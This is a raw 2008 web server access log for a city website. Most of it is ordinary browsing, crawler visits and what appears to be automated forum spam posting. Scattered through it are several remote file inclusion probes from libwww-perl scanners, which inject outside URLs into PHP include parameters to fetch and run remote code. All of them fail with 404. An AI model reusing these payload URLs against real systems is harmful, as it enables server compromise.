12.25.213.2 - - [15/Nov/2008:04:40:24 -0800] "GET /sampo/flv/102208/1.jpg HTTP/1.1" 200 14487 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:40:24 -0800] "GET /sampo/flv/10282008/9.flv HTTP/1.1" 200 786432 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
78.157.143.212 - - [15/Nov/2008:04:40:25 -0800] "GET /jodera2/login.php HTTP/1.0" 200 13249 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:40:25 -0800] "GET /listings/layout/general_noimage.css HTTP/1.1" 200 89 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14837" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "www.sancarloscity.org"
78.157.143.212 - - [15/Nov/2008:04:40:26 -0800] "POST /jodera2/login.php?sid=767ba0f52a3d67abe0f6c6de133a9bb6 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:40:29 -0800] "GET /listings/layout/listing_result.css HTTP/1.1" 200 12330 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14837" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "www.sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:40:36 -0800] "GET /listings/layout/listing_color.css HTTP/1.1" 200 4496 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14837" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "www.sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:40:37 -0800] "GET /listings/layout/color/white_blue.css HTTP/1.1" 200 24170 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14837" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "www.sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:40:40 -0800] "GET /listings/scripts/common.js HTTP/1.1" 200 5162 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14837" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "www.sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:40:41 -0800] "GET /jodera2/viewforum.php?f=15&sid=1466860e65dbb9fce77b6c0015e6c801 HTTP/1.0" 200 83375 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:40:42 -0800] "GET /listings/scripts/location.js HTTP/1.1" 200 4102 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14837" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "www.sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:40:43 -0800] "GET /listings/scripts/menusearch.js HTTP/1.1" 200 614 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14837" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "www.sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:40:43 -0800] "GET /listings/scripts/contactclick.js HTTP/1.1" 200 1110 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14837" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "www.sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:40:44 -0800] "GET /listings/scripts/cookies.js HTTP/1.1" 200 2224 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14837" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "www.sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:40:45 -0800] "GET /listings/upload/image_files/photo_78.gif HTTP/1.1" 200 15262 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14837" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:40:45 -0800] "GET /listings/images/color/white_blue/img_logo.gif HTTP/1.1" 200 18765 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14837" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:40:47 -0800] "GET /listings/images/design/bg_businessButton.gif HTTP/1.1" 200 168 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14837" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:40:47 -0800] "GET /listings/images/color/white_blue/bt_addlisting.gif HTTP/1.1" 200 2991 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14837" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:40:48 -0800] "GET /listings/images/content/bullet_viewQuickList.gif HTTP/1.1" 200 431 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14837" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:40:48 -0800] "GET /listings/images/design/bullet_headerLogin.gif HTTP/1.1" 200 57 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14837" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:40:48 -0800] "GET /listings/images/design/bg_navbar_businessOn.gif HTTP/1.1" 200 43 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14837" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "sancarloscity.org"
78.157.143.212 - - [15/Nov/2008:04:40:48 -0800] "GET /jodera2/profile.php?mode=editprofile HTTP/1.0" 200 34886 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:40:49 -0800] "GET /listings/images/design/img_rateSmallStarOff.gif HTTP/1.1" 200 607 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14837" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:40:49 -0800] "GET /listings/images/design/img_rateStar.gif HTTP/1.1" 200 576 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14837" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:40:49 -0800] "GET /listings/upload/image_files/photo_118.jpg HTTP/1.1" 200 22885 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14837" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:40:50 -0800] "GET /listings/upload/image_files/photo_117.jpg HTTP/1.1" 200 20863 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14837" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "sancarloscity.org"
78.157.143.212 - - [15/Nov/2008:04:40:51 -0800] "GET /jodera2/index.php?sid=767ba0f52a3d67abe0f6c6de133a9bb6 HTTP/1.0" 200 55239 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
78.157.143.212 - - [15/Nov/2008:04:40:51 -0800] "GET /jodera2/index.php HTTP/1.0" 200 55239 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
78.157.143.212 - - [15/Nov/2008:04:40:52 -0800] "GET /jodera2/index.php HTTP/1.0" 200 55239 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:40:53 -0800] "GET /favicon.ico HTTP/1.1" 404 739 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "sancarloscity.org"
78.157.143.212 - - [15/Nov/2008:04:40:53 -0800] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 41372 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:40:57 -0800] "POST /jodera2/posting.php HTTP/1.0" 200 11440 "http://sancarloscity.org/jodera2/posting.php?mode=newtopic&f=6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
81.19.66.38 - - [15/Nov/2008:04:40:57 -0800] "GET /jodera2/viewtopic.php?p=27280 HTTP/1.1" 200 69171 "-" "StackRambler/2.0 (MSIE incompatible)" "www.sancarloscity.org"
89.149.227.208 - - [15/Nov/2008:04:40:58 -0800] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=32674&sid=73c44ac7f6f553fae38fc300d5ef5374" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.5) Gecko/20031007 Firebird/0.7" "www.sancarloscity.org"
81.19.66.38 - - [15/Nov/2008:04:40:59 -0800] "GET /jodera2/viewtopic.php?p=27268 HTTP/1.1" 200 69277 "-" "StackRambler/2.0 (MSIE incompatible)" "www.sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:41:00 -0800] "GET /sampo/flv/10282008/9.flv HTTP/1.1" 200 12970980 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.19.66.38 - - [15/Nov/2008:04:41:01 -0800] "GET /jodera2/viewtopic.php?p=27263&sid=544be5e4496167c39c16525507657dc7 HTTP/1.1" 200 69416 "-" "StackRambler/2.0 (MSIE incompatible)" "www.sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:41:03 -0800] "GET /jodera2/posting.php?mode=newtopic&f=15 HTTP/1.0" 200 41374 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
81.19.66.38 - - [15/Nov/2008:04:41:03 -0800] "GET /jodera2/viewtopic.php?p=27747&sid=f1e422c94a77e53c8465954a0b1a0426 HTTP/1.1" 200 120698 "-" "StackRambler/2.0 (MSIE incompatible)" "www.sancarloscity.org"
70.85.149.242 - - [15/Nov/2008:04:41:03 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 779 "-" "libwww-perl/5.819" "www.sancarloscity.org"
81.19.66.38 - - [15/Nov/2008:04:41:06 -0800] "GET /jodera2/viewtopic.php?p=27188&sid=9d2edeb873bd38781a6668dc30b24ef7 HTTP/1.1" 200 69340 "-" "StackRambler/2.0 (MSIE incompatible)" "www.sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:41:17 -0800] "POST /jodera2/posting.php HTTP/1.0" 200 11441 "http://sancarloscity.org/jodera2/posting.php?mode=newtopic&f=15" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:41:18 -0800] "GET /jodera2/viewtopic.php?p=42450 HTTP/1.0" 200 36638 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:41:19 -0800] "GET /jodera2/viewforum.php?f=10&sid=1466860e65dbb9fce77b6c0015e6c801 HTTP/1.0" 200 11228 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:41:22 -0800] "GET /listings/event/ HTTP/1.1" 200 13904 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14837" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "www.sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:41:24 -0800] "GET /listings/layout/event_front.css HTTP/1.1" 200 3243 "http://www.sancarloscity.org/listings/event/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "www.sancarloscity.org"
84.19.178.210 - - [15/Nov/2008:04:41:24 -0800] "GET /logs/access_081102.log//modules/TotalCalendar/about.php?inc_dir=http://siam2.com/ict/news/photo/.photo/cmdstring.swf? HTTP/1.1" 404 791 "-" "libwww-perl/5.805" "www.sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:41:24 -0800] "GET /listings/layout/event_color.css HTTP/1.1" 200 5462 "http://www.sancarloscity.org/listings/event/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "www.sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:41:29 -0800] "GET /listings/upload/image_files/photo_104.swf HTTP/1.1" 200 16843 "http://www.sancarloscity.org/listings/event/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "www.sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:41:29 -0800] "GET /listings/images/content/bullet_viewQuickListEvent.gif HTTP/1.1" 200 47 "http://www.sancarloscity.org/listings/event/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:41:30 -0800] "GET /listings/upload/image_files/photo_154.jpg HTTP/1.1" 200 38670 "http://www.sancarloscity.org/listings/event/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:41:31 -0800] "GET /listings/images/design/bg_navbar_eventOn.gif HTTP/1.1" 200 43 "http://www.sancarloscity.org/listings/event/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:41:32 -0800] "GET /listings/images/design/bullet_events.gif HTTP/1.1" 200 49 "http://www.sancarloscity.org/listings/event/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "sancarloscity.org"
72.30.79.34 - - [15/Nov/2008:04:41:33 -0800] "GET /listings/listing/results.php?letter=e&category_id=759 HTTP/1.0" 200 25585 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:41:40 -0800] "GET /jodera2/posting.php?mode=newtopic&f=15 HTTP/1.0" 200 41374 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:41:53 -0800] "GET /jodera2/index.php HTTP/1.0" 200 55219 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:41:55 -0800] "GET /jodera2//posting.php?mode=newtopic&f=15 HTTP/1.0" 200 41374 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:41:57 -0800] "GET /listings/article/ HTTP/1.1" 200 6238 "http://www.sancarloscity.org/listings/event/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "www.sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:41:58 -0800] "GET /listings/layout/article_front.css HTTP/1.1" 200 7234 "http://www.sancarloscity.org/listings/article/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "www.sancarloscity.org"
84.16.231.171 - - [15/Nov/2008:04:42:06 -0800] "GET /jodera2/posting.php?mode=reply&t=32675 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=32675" "Mozilla/4.76 [en] (Windows NT 5.0; U)" "www.sancarloscity.org"
84.16.231.171 - - [15/Nov/2008:04:42:06 -0800] "GET /jodera2/login.php?redirect=posting.php&mode=reply&t=32675&sid=b5b9a2eefd60478deec40574851abb7b HTTP/1.0" 200 12363 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=32675&sid=b5b9a2eefd60478deec40574851abb7b" "Mozilla/4.76 [en] (Windows NT 5.0; U)" "www.sancarloscity.org"
72.30.79.34 - - [15/Nov/2008:04:42:07 -0800] "GET /picgallery/displayimage.php?pos=-168 HTTP/1.0" 200 9723 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:42:08 -0800] "POST /jodera2//posting.php HTTP/1.0" 200 11441 "http://sancarloscity.org/jodera2//posting.php?mode=newtopic&f=15" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
84.16.231.171 - - [15/Nov/2008:04:42:08 -0800] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=32675&sid=b5b9a2eefd60478deec40574851abb7b" "Mozilla/4.76 [en] (Windows NT 5.0; U)" "www.sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:42:09 -0800] "GET /jodera2//viewtopic.php?p=42451 HTTP/1.0" 200 36735 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
84.16.231.171 - - [15/Nov/2008:04:42:09 -0800] "GET /jodera2/posting.php?mode=reply&t=32675&sid=b5b9a2eefd60478deec40574851abb7b HTTP/1.0" 200 50815 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=32675&sid=b5b9a2eefd60478deec40574851abb7b" "Mozilla/4.76 [en] (Windows NT 5.0; U)" "www.sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:42:10 -0800] "GET /jodera2//viewforum.php?f=11&sid=1466860e65dbb9fce77b6c0015e6c801 HTTP/1.0" 200 82926 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
74.220.215.73 - - [15/Nov/2008:04:42:12 -0800] "POST /forum2/index.php?automodule=blog&blogid=3&req=trackback&eid=25 HTTP/1.0" 200 127 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9)" "www.sancarloscity.org"
84.16.231.171 - - [15/Nov/2008:04:42:31 -0800] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=32675&sid=b5b9a2eefd60478deec40574851abb7b" "Mozilla/4.76 [en] (Windows NT 5.0; U)" "www.sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:42:33 -0800] "GET /jodera2//posting.php?mode=newtopic&f=11 HTTP/1.0" 200 41360 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
84.16.231.171 - - [15/Nov/2008:04:42:33 -0800] "GET /jodera2/viewtopic.php?p=42452 HTTP/1.0" 200 82925 "http://www.sancarloscity.org/viewtopic.php?p=42452#42452" "Mozilla/4.76 [en] (Windows NT 5.0; U)" "www.sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:42:41 -0800] "GET /sampo/flv/11132008/3.flv HTTP/1.1" 200 3276800 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
82.99.30.20 - - [15/Nov/2008:04:42:42 -0800] "GET /jodera2/groupcp.php?sid=5a11e879970ab76101181bd544d0d297 HTTP/1.0" 200 17496 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
70.85.149.242 - - [15/Nov/2008:04:42:42 -0800] "GET /logs/access_080928.log//components/com_simpleboard/image_upload.php?sbp=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 803 "-" "libwww-perl/5.819" "www.sancarloscity.org"
74.53.7.15 - - [15/Nov/2008:04:42:44 -0800] "GET /logs/access_081025.log/common/init.php?CFG[CDIR]=http://you-buy-viagra.com/files/id.txt?? HTTP/1.1" 404 774 "-" "libwww-perl/5.811" "www.sancarloscity.org"
74.53.7.15 - - [15/Nov/2008:04:42:44 -0800] "GET /common/init.php?CFG[CDIR]=http://you-buy-viagra.com/files/id.txt?? HTTP/1.1" 404 751 "-" "libwww-perl/5.811" "www.sancarloscity.org"
74.53.7.15 - - [15/Nov/2008:04:42:44 -0800] "GET /logs/common/init.php?CFG[CDIR]=http://you-buy-viagra.com/files/id.txt?? HTTP/1.1" 404 756 "-" "libwww-perl/5.811" "www.sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:42:45 -0800] "GET /listings/layout/article_color.css HTTP/1.1" 200 4027 "http://www.sancarloscity.org/listings/article/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "www.sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:42:46 -0800] "GET /listings/images/design/bg_standardButton.gif HTTP/1.1" 200 168 "http://www.sancarloscity.org/listings/article/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:42:46 -0800] "GET /listings/images/content/bullet_viewQuickListArticle.gif HTTP/1.1" 200 47 "http://www.sancarloscity.org/listings/article/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:42:47 -0800] "GET /listings/images/color/white_blue/bt_addarticle.gif HTTP/1.1" 200 2520 "http://www.sancarloscity.org/listings/article/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:42:48 -0800] "POST /jodera2//posting.php HTTP/1.0" 200 11441 "http://sancarloscity.org/jodera2//posting.php?mode=newtopic&f=11" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:42:49 -0800] "GET /jodera2//viewtopic.php?p=42453 HTTP/1.0" 200 36636 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
213.189.20.67 - - [15/Nov/2008:04:42:49 -0800] "GET /logs/access_080928.log%20/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.easysupportdesk.com/cache/id.txt??? HTTP/1.1" 404 831 "-" "libwww-perl/5.803" "www.sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:42:49 -0800] "GET /listings/images/design/bullet_article.gif HTTP/1.1" 200 49 "http://www.sancarloscity.org/listings/article/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:42:50 -0800] "GET /listings/images/design/bg_navbar_articleOn.gif HTTP/1.1" 200 43 "http://www.sancarloscity.org/listings/article/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:42:50 -0800] "GET /jodera2//viewforum.php?f=16&sid=1466860e65dbb9fce77b6c0015e6c801 HTTP/1.0" 200 82954 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:42:50 -0800] "GET /listings/upload/image_files/photo_84.gif HTTP/1.1" 200 15159 "http://www.sancarloscity.org/listings/article/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:42:51 -0800] "GET /sampo/flv/11132008/4.flv HTTP/1.1" 200 4016100 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:43:12 -0800] "GET /jodera2//posting.php?mode=newtopic&f=16 HTTP/1.0" 200 41353 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:43:14 -0800] "GET /jodera2//viewforum.php?f=16&topicdays=0&start=150 HTTP/1.0" 200 64923 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
193.47.80.36 - - [15/Nov/2008:04:43:48 -0800] "GET /robots.txt HTTP/1.1" 200 44 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "sancarloscity.org"
